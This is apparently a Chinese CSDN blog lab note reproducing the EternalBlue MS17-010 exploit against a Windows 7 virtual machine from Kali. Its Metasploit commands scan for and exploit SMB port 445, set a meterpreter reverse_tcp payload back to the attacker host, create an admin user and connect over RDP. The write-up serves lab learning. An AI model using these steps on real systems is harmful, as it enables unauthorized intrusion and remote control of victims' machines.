永恒之蓝ms17_010复现笔记详解

最新推荐文章于 2024-05-29 11:22:22 发布
最新推荐文章于 2024-05-29 11:22:22 发布
阅读量737 收藏 5
点赞数 1
分类专栏: web 文章标签: 永恒之蓝 ms17_010漏洞利用复现 主机漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LTtiandd/article/details/99317292
版权

简单的讲解一下永恒之蓝的复现过程.在这个漏洞中利用的是445端口来进行攻击渗透的。

本次实验的环境:

攻击机为kali: 192.168.233.131

目标主机为windows 7 旗舰版:处于nat网络下的虚拟机 192.168.233.144

为了更方便的实现复现,关闭目标主机的防火墙,之后开启目标主机就没他什么事了

第一步老样子,探测同一局域网的存活主机:

nmap -sP 192.168.233.1/24

或者使用:

arp-scan -l

 

下一步就是用nmap进行端口探测:

nmap -sT -A -p0 192.168.233.144

 

这里我们看到有445以及3389端口可以进行利用,咱们这次主要是利用445端口来获取目标主机的meterpreter权限以及cmd权限

开始利用kali进行模块搜索:

search ms17_010

 

咱们这里主要就是用这两个来进行攻击的,一个是辅助模块用来检查远程主机是否含有这个漏洞的另一个是攻击模块了,可以直接拿到cm权限。

 

先利用辅助模块来验证一下是否存在着这个漏洞吧:

use auxiliary/scanner/smb/smb_ms17_010

show options

sset RHOSTS 192.168.233.144

run 

 

发现是存在漏洞的:

 

利用攻击模块进行攻击:

use exploit/windows/smb/ms17_010_eternalblue

show options 

set RHOSTS 192.168.233.144

exploit

这样可以直接拿到cmd权限,但是呢我现在想拿到meterpreter的shell应该怎么做呢?

有两种方法第一种比较麻烦,也不普遍:那就是用msfvenom 生成一个exe后门程序上传到目标主机上并在目标主机上运行,(这似乎有点难度)

所以我就用简单点的方法,就是选择攻击模块的时候,下一步选择一个meterpreter/reverse_tcp的一个payload

use exploit/windows/smb/ms17_010_eternalblue

 

show options 

 

set RHOSTS 192.168.233.144

 

set payload windows/x64/meterpreter/reverse_tcp

 

show options 

 

set LHOST 192.168.233.131

 

exploit

 

完成已经获取meterpreter

输入命令shell即可进入cmd权限,这是就可以直接创建管理员用户用kali来连接远程主机

rdesktop 192.168.233.144:3389

即可操作目标主机了

 

 

Leng_tian
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
可刑又可拷!永恒之蓝漏洞原理及复现
hack0919的博客
04-24 5418
2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒
网络攻防——永恒之蓝
weixin_46560512的博客
03-09 2万+
主要介绍永恒之蓝程序,即 windows7的SMB协议漏洞以及相关的攻击方式。
Kali--MSF-永恒之蓝详解复现、演示、远程、后门、加壳、修复)
热门推荐
m0_65712192的博客
11-01 3万+
Kali--MSF-永恒之蓝详解复现、演示、远程、后门、加壳、修复)
永恒之蓝MS17-010详解
最新发布
m0_64481831的博客
05-29 867
SMB是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居都是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。SMB工作原理1、客户端发送一个SMB negport请求数据包,并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望使用的SMB协议版本。如果没有可用的协议版本则返回0xFFFFH,结束通信。
永恒之蓝全过程复现
Zhaokangkang123的博客
02-09 6490
超详细永恒之蓝复现教程
永恒之蓝漏洞复现(ms17-010)
weixin_43913009的博客
04-01 2万+
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、永恒之蓝(Eternal Blue)二、复现环境三、复现过程1.主机发现2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、永恒之蓝(Eternal Blue) 永恒之蓝是在 Windows 的SMB服务处理SMB v1请求时发生的漏.
渗透基础笔记+作业(永恒之蓝复现
09-08
MS17-010,也称为“永恒之蓝”,是一个著名的漏洞,主要影响Windows操作系统,尤其是Windows 7。复现环境通常包括攻击机(如Kali Linux)和靶机(如Windows 7)。工具如Nmap用于网络扫描,Metasploit则作为渗透框架...
永恒之蓝(EternalBlue)
yy1024iy的博客
05-30 1256
本文介绍了永恒之蓝的基本概念和攻击方法,以及建议用户采取什么措施来防止自己受到攻击。永恒之蓝是一种利用微软Windows系统漏洞的攻击工具,被黑客广泛使用。文章描述了永恒之蓝的操作过程,并提醒读者应该定期更新操作系统和安全软件,严格保护密码等敏感信息,以避免受到网络攻击的威胁。
永恒之蓝复现(个人申明,此为个人学习的笔记,可能摘录自他人的文章,而非原创)
2301_76881678的博客
03-21 1744
永恒之蓝漏洞复现(单人版)
永恒之蓝-------MS17010漏洞重现
2301_77144243的博客
06-07 2453
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
MS17-010(永恒之蓝)—漏洞复现及防范》
weixin_47118413的博客
04-10 1万+
通过Kali使用msfconsole在Win7复现MS17-010(永恒之蓝)漏洞以及如何防范。
永恒之蓝ms17-0109(缓冲区溢出漏洞)
weixin_53711701的博客
12-24 1272
永恒之蓝ms17-0109(缓冲区溢出漏洞)
永恒之蓝(ms17-010)简介与复现
weixin_52685785的博客
01-15 2753
一、永恒之蓝的介绍 ;二、漏洞描述 ;三、MSF介绍 ;四、漏洞复现
基础渗透测试实验—永恒之蓝漏洞复现
G6_12的博客
06-08 4061
ms17-010永恒之蓝漏洞复现
永恒之蓝ms17_010漏洞复现实验
01-03
很抱歉,根据提供的引用内容,我无法提供关于永恒之蓝MS17-010漏洞复现实验。这是因为复现漏洞需要特定的环境和设备,并且涉及到非法活动。我强烈建议您不要尝试复现漏洞,以免违法和造成不必要的损失。 如果您对网络安全感兴趣,我可以为您提供一些关于网络安全的基础知识和防护措施。请问您对此感兴趣吗?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Leng_tian

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值